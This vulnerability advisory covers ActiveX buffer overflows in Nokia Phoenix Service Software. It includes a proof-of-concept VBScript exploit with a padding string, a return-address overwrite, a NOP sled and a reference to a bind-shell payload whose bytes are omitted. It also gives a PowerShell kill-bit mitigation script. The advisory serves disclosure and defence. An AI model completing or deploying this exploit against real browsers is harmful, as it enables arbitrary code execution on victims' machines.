Nokia Phoenix Service Software ActiveX Control Multiple Buffer Overflow Vulnerabilities
Release date: 2009-02-10
Updated: 2009-02-11
Affected systems:
Nokia Phoenix Service Software 2008.04.007.32837
Description:
BUGTRAQ ID: 33726
Nokia Phoenix Service Software is a tool used for flashing Nokia mobile phones.
The cmnsignalanalyzerfn.dll ({F85B4A10-B530-4D68-A714-7415838FD174}) and cmnsignalgeneratorfn.dll ({929A0D77-044A-497F-8FDF-8EDE81F6251A}) libraries shipped with Nokia Phoenix Service Software do not properly validate user-supplied parameters. If a user is tricked into visiting a malicious web page that passes an overly long parameter to one of the vulnerable ActiveX controls, a buffer overflow is triggered, allowing arbitrary code execution in the context of the user's browser session.
<*Source: MurderSkillz (murderskill@gmail.com)
Link: http://marc.info/?l=bugtraq&m=123430097127418&w=2
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and educational purposes only. Use at your own risk!
<object classid='clsid:F85B4A10-B530-4D68-A714-7415838FD174' id='Fucker'></object>
<script language = 'vbscript'>
junk = String(370, "A")
EIP = unescape("%53%49%48%7E") 'call esp from user32.dll XpPro Sp3/IE7
nop = String(12, unescape("%90"))
' win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com (encoded payload bytes omitted)
NokiaFucker = junk + EIP + nop + shellcode
Fucker.SelectDevice NokiaFucker,""
</script>
</html>
Recommendations:
Temporary workaround:
* Set the kill-bit for CLSIDs {F85B4A10-B530-4D68-A714-7415838FD174} and {929A0D77-044A-497F-8FDF-8EDE81F6251A}.
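The kill-bit workaround above, as an added example that is not from the advisory, from NSFOCUS or from Nokia: an elevated PowerShell script that sets the Internet Explorer kill-bit (Compatibility Flags 0x400 under the ActiveX Compatibility key) for both CLSIDs and reads it back. It assumes that 32-bit IE on 64-bit Windows consults the Wow6432Node copy of the key, so that copy is written as well.

```powershell
# Added example (not part of the advisory): set and verify the IE ActiveX kill-bit
# for the two CLSIDs named in the advisory. Run from an elevated PowerShell.
$Clsids = @(
    '{F85B4A10-B530-4D68-A714-7415838FD174}',  # cmnsignalanalyzerfn.dll
    '{929A0D77-044A-497F-8FDF-8EDE81F6251A}'   # cmnsignalgeneratorfn.dll
)
$KillBit = 0x400   # kill-bit flag: IE refuses to instantiate the control

function Set-ActiveXKillBit {
    param([string]$Clsid, [switch]$Wow64)
    # Assumption: 32-bit IE on 64-bit Windows reads the Wow6432Node copy of the key
    $base = if ($Wow64) { 'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility' }
            else        { 'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility' }
    $key = Join-Path $base $Clsid
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    # Preserve any compatibility flags already set and OR in the kill-bit
    $existing = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    $flags = [int]$existing -bor $KillBit
    Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value $flags -Type DWord
}

function Test-ActiveXKillBit {
    param([string]$Clsid)
    $key = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
    $flags = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    return (([int]$flags -band $KillBit) -eq $KillBit)
}

foreach ($c in $Clsids) {
    Set-ActiveXKillBit -Clsid $c
    if ([Environment]::Is64BitOperatingSystem) { Set-ActiveXKillBit -Clsid $c -Wow64 }
    '{0} kill-bit set: {1}' -f $c, (Test-ActiveXKillBit -Clsid $c)
}
```

Setting the kill-bit only stops Internet Explorer from loading the control; Phoenix itself continues to work, and the setting should be reverted only once a fixed version is installed.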
Vendor patch:
Nokia
-----
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:
http://www.nokia.com
